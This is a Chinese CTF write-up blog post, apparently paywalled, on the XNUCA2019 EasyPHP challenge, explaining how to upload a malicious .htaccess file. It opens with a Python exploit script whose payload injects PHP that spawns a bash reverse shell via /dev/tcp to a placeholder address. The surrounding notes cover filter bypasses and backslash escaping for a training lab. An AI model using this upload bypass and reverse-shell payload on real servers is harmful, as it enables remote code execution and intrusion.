BUUCTF:[XNUCA2019Qualifier]EasyPHP -- 关于.htaccess 的各种配置操作,

最新推荐文章于 2023-03-22 19:00:38 发布
VIP文章 最新推荐文章于 2023-03-22 19:00:38 发布
阅读量1.3k 收藏 4
点赞数
分类专栏: BUUCTF刷题记录 文章标签: php web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zero_Adam/article/details/115740087
版权 
import requests

url = 'http://02cdf9ef40d440d1bd0ba727da4b348c21ce0e526eea4fad.changame.ichunqiu.com/'
payload = '?filename=.htaccess&content=php_value%20auto_prepend_fi\\%0Ale%20".htaccess"\n%23<?php system(\'bash -c "/bin/bash -i >%26 /dev/tcp/ip/port 0<%261"\');?>\\'
url2 = url + payload
r = requests.get(url2)
req = request.get(url)

python 方法:

参考的文章,看最下面的那两篇就是了
总体:
这些方法看起来很棒,其实我感觉这都是参赛者当时 细心看PHP文档才发现的,而我辈现在直接看他们的现成的东西,如此巧妙的方法之下,是大佬们细心找到的bug点,其实真正应该习得的是认真看文档的能力,从很多的配置信息中找到我们能够利用的 点这个才是真正的能力

一、自己做:

做个毛,做,这个题是我能做出来的???
没有个数,看WP去,,

这个 正则,文件名开头不能是 字母开头,又不能是数字,那就只能够是.了啊,再看一下黑名单???防止马的黑名单是这个吗??

没见过的黑名单,那就是上传.htaccess了啊,

二、学到的&&不足:

1. python 上传.htaccess时的\问题

注意在用python传入的时候,这个用一个\,是不行的,在python中的\和Linux中的一样也是 连接两行的意思,
在这里插入图片描述我们这里需要两个\\,这样转义一下,才行

最低0.47元/天 解锁文章
Zero_Adam
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XNUCA2020Qualifier:XNUCA2020Qualifier的文章
04-13
XNUCA2020限定符XNUCA2020Qualifier的文章
volgactf-qualifier-frontend:VolgaCTF Qualifier平台前端
05-03
VolgaCTF Qualifier前端 VolgaCTF Qualifier平台前端。 对于开发人员 建立资产 $ npm run build 皮棉代码 $ npm run lint 执照 麻省理工学院@
[XNUCA2019Qualifier]EasyPHP
shinygod的博客
03-05 414
htaccess 的各种利用 y4 师傅的文章就写的很详细,其中还有很多解决这道题的方法,这边就不一一列举了。拼接上下两行,那么我们可以直接在 .htaccess 里写 shell,加上。php.htaccess 文件中可以用 # 号注释某行,也可以用。设置把 shell 包含到 index.php 中。payload: 当然要对代码 url 编码一下。
[XNUCA2019Qualifier]EasyPHP.htaccess的利用。
snowlyzz的博客
08-30 383
.htaccess配置文件设置
【复习】BUUCTF:[GXYCTF2019]BabyUpload -- 对.htaccess的 包含自己和解析图片马为php文件都可以的 。。也算easy
Zero_Adam的博客
04-19 1015
一、自己做: 只需要更改Content-Type就能够绕过了,但是好像对文件内容有过滤。 那么,不能有? ,看看PHP的版本,看看能够用html的script进行绕过 能成功,看看能否解析。
BUUCTF】刷题总结(基础篇)
weixin_51614272的博客
05-15 2171
目录[GXYCTF2019]Ping Ping Ping[极客大挑战 2019]Upload[极客大挑战 2019]BabySQL[ACTF2020 新生赛]Upload[极客大挑战 2019]BuyFlag[ACTF2020 新生赛]BackupFile[BJDCTF2020]Easy MD5[RoarCTF 2019]Easy Calc[HCTF 2018]admin[MRCTF2020]你传你🐎呢 [GXYCTF2019]Ping Ping Ping 知识点:命令执行 绕过: ; 来拼接命令 $I
Python库 | atreal.richfile.qualifier-1.0.0beta3-py2.4.egg
02-21
python库,解压后可用。 资源全名:atreal.richfile.qualifier-1.0.0beta3-py2.4.egg
volgactf-qualifier-backend:VolgaCTF Qualifier平台后端
03-13
VolgaCTF Qualifier后端VolgaCTF Qualifier平台后端。对于开发人员转码$ npm run build管理员实用程序$ npm run cli皮棉代码$ npm run lint执照麻省理工学院@
PyPI 官网下载 | atreal.richfile.qualifier-1.0.0beta3-py2.4.egg
02-11
资源来自pypi官网。 资源全名:atreal.richfile.qualifier-1.0.0beta3-py2.4.egg
BUUCTF_Web题目题解记录1
Altering_Ji的博客
07-11 2240
记录一下buu 刷题网站上最近做的三道web题目:[GYCTF2020]Blacklist(堆叠注入)、[网鼎杯 2020 青龙组]AreUSerialz(反序列化)、[GXYCTF2019]BabyUpload(文件上传)
i春秋网络内生安全试验场CTF夺旗赛(第二季)部分wp
qq_42188168的博客
10-26 889
i春秋 2019-10月CTF答题夺旗赛 web部分wp 1.easyphp 通过观察可以发现img传参base64解码;同样的方法可得index.php源码 之后构造序列化。。。。。 2、calculate1,2 写wp前删掉了脚本,简述下:利用selenium运算公式并结合chromedriver进行10次提交 3、babysql 之后测试admin’orderby 1# 到3,直到4...
buu刷题(4)
qq_62046696的博客
03-22 511
题目中只限制了 F I L E S [ f i l e ] ∗ ∗ 的上传后缀,也只给出 ∗ ∗ _FILES[file]** 的上传后缀,也只给出 ** FILES[file]∗∗的上传后缀,也只给出∗∗_FILES[file] 上传后的路径,那我们上传多文件就可以绕过。人傻了,上面的思路全部错掉,上面输入的filename文件,其实是没有权限执行php代码的,这点我们可以通过phpinfo();所以我们的恶意代码先执行。也是通过报错推断出过滤了{{而没用过滤{,这里我用的是{%3*3%}发现回显的是,
ByteCTF_2019&XNUCA_2019部分web题复现
Lethe's Blog
09-11 4545
EzCMS 1、扫描目录有www.zip,下载得到源码。 整个题目的功能如下: index.php页面验证登陆,可以任意账号登陆到upload.php上传页面,但是只有admin账号才能进行文件上传。 访问了upload.php·,就会在沙盒下生成一个.htaccess文件,内容为:lolololol, i control all。 上传文件后,会返回文件的存储路径,view details可以...
.htaccess 的利用实践
qq_53755216的博客
06-28 240
简介 最近做文件上传题目时遇到了利用.htaccess文件进行rce的题目 正好今天刷freebuff时 又看到了一篇文章 这里就认真总结一下 发现一个好玩的现象 freebuff搜索 .htaccess 的时候返回404 算是给过滤了?hh 常规利用方式 way1 我在本地开了个环境试了一下 .htaccess 写入 AddType application/x-httpd-php .txt 当访问1.txt时 就可以将1.txt当成php文件来执行 way2 将 .htaccess文件自身当成php
BUU CTF web(四)
0xdawn的博客
05-11 4982
[HarekazeCTF2019]encode_and_encode <?php error_reporting(0); if (isset($_GET['source'])) { show_source(__FILE__); exit(); } function is_valid($str) { $banword = [ // no path traversal '\.\.', // no stream wrapper '(php|file|glob
BUUCTF web writeup
热门推荐
stepone4ward的博客
09-11 1万+
buuctf题目的部分writeup,持续更新中
BUUCTF刷题记录(6)
bmth666的博客
05-14 4555
文章目录web[FBCTF2019]RCEService webctf(×) 被ctf打(√) [FBCTF2019]RCEService 首先查看文件夹文件,{"cmd":"ls"} 然后输入其他的发现被ban了,看wp得源码 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { ...
UNCTF2020web方向部分题解
bmth666的博客
11-18 1624
文章目录Web方向easy_ssrfeasyflask俄罗斯方块人大战奥特曼easyunserializebabyevalezphpeasy_uploadUN's_online_toolsezfind其他的题目的一些思路:checkin-sql:easyphpWeb方向 easy_ssrf php遇到不认识的协议就会当目录处理 ?url=0://unctf.com/../../../../../../../../flag easyflask SSTI/沙盒逃逸详细总结 SSTI模板注入及绕过姿势(基
错误:expected specifier-qualifier-list before ‘__kernel_long_t’
最新发布
06-09
这个错误通常是因为缺少`#include <linux/types.h>`导致的。`__kernel_long_t`是在`<linux/types.h>`中定义的类型。请确保你的代码中包含了该头文件。如果已经包含了该头文件,那么可能是由于代码中使用了未定义的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值